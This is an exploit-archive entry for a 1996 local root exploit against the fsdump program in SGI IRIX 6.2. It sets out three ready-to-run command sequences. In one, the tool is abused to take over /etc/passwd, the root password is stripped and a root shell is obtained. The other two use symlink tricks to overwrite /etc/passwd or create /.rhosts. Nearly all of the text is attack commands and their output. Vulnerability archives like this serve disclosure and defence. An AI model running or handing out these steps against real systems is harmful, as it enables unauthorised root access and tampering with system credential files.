SGI IRIX 6.2 - fsdump Local Privilege Escalation

1996-12-03T00:00:00
ID EXPLOITPACK:DD543F52ED2DA984E6F1683A55025D53
Type exploitpack
Reporter Jaechul Choe
Modified 1996-12-03T00:00:00

Description

SGI IRIX 6.2 - fsdump Local Privilege Escalation

                                        
                                            source: https://www.securityfocus.com/bid/355/info

A number of vulnerabilities exist in the fsdump program included with Silicon Graphics Inc's IRIX operating system. Each of these holes can be used to obtain root privlilege. 

Variant 1:
irix% /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump /
(count to three, and hit ctrl-c)
irix% ls -la /etc/passwd
-rw-r--r-- 1 csh users 956 Feb 25 06:23 /etc/passwd
irix% tail -8 /etc/passwd
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null

Tue Feb 25 06:23:48 PST 1997
Number of inodes total 208740; allocated 31259
Collecting garbage.
interrupted
irix% vi /etc/passwd # remove the encrypted root password
irix% chgrp sys /etc/passwd
irix% chown root /etc/passwd
irix% su -
irix#

Variant 2:

cp /etc/passwd /tmp/passwd
ln -s /etc/passwd rfd.lock
/var/rfindd/fsdump -F/tmp/rfd /
/var/rfindd/fsdump -L/etc/passwd -F/tmp/rfd /

Variant 3:
cd /tmp
ln -s /.rhosts fsdump.dir
/var/rfindd/fsdump -Fgimme /
ls -al /.rhosts
rm -f fsdump.dir fsdump.pag gimme